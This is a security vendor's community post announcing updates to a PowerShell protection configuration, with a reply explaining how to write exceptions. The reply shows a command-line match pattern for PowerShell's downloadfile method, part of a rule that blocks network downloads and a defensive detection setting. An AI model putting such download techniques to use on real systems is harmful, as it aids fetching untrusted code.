Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments | Download Now

The CB Protection Powershell Rapid Config has been updated.

The CB Protection Powershell Rapid Config has been updated.

Based on community feedback, we’ve updated the Powershell Rapid Config. These new updates will be pushed out today via the CDC to all 8.0 P7 and later CB Protection servers.

If you already have the Powershell Rapid Config enabled, these updates should not modify your existing settings.

The following additions have been made;

  • You now have the ability to add exception cases to the protectionspowershellexceptions.png

 

  • In the Downgrade Attacks section you can now Report or Block when 64 Bit Powershell executes the 32 bit version of Powershell. If you have the Rapid Config enabled this new protection will be enabled in Report mode.powershelldowngrade.png

 

Thank you to the community for your ongoing support and feedback.

Larry

Labels (1)
Tags (1)
Comments

Is there any guidance on HOW to format exceptions? 

Hi,

The exceptions would be formatted as command line macros. 
There are descriptions of the various command line macro options in the help. 
Taking the second section that is protecting against command lines that include downloadfile as an example...If you wanted to allow myfile.txt to be down loaded you could add an exception such as the following to that section:
<cmdline:*.downloadfile*myfile.txt*>*
That would allow .downloadfile followed by anything that includes myfile.txt.

I hope that helps.
Mark

Article Information
Author:
Creation Date:
‎09-16-2019
Views:
1845
Contributors